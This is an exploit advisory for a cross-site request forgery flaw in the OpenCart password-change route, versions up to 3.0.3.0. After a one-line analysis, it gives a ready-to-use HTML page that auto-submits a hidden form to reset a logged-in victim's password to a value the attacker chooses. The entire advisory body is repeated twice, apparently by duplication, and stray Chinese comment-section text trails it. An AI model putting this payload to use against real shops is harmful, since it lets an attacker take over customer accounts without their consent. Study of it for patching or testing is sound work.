Opencart-v3-0-3-0 user changes password at csrf vulnerability
Software Link:https://github.com/opencart/opencart/
Date: 06.28.2018
Exploit Author:CK01
Version:<= V3-0-3-0
0x00 Vulnerability analysis
The user token was not verified at the password change, causing the csrf vulnerability to modify the user password
/upload/catalog/controller/account/password.php
0x01 Exploit
Save the following exp as html and open the run
<html>
<body>
<form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="CK01ck01" />
<input type="hidden" name="confirm" value="CK01ck01" />
<script>
document.getElementById('post123').submit();
</script>
</form>
</body>
</html>
The end user's password will be modified and there will be problems in the user's modification of the data.
Date: 06.28.2018
Exploit Author:CK01
Version:<= V3-0-3-0
0x00 Vulnerability analysis
The user token was not verified at the password change, causing the csrf vulnerability to modify the user password
/upload/catalog/controller/account/password.php
0x01 Exploit
Save the following exp as html and open the run
<html>
<body>
<form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="CK01ck01" />
<input type="hidden" name="confirm" value="CK01ck01" />
<script>
document.getElementById('post123').submit();
</script>
</form>
</body>
</html>
The end user's password will be modified and there will be problems in the user's modification of the data.
评论
发表评论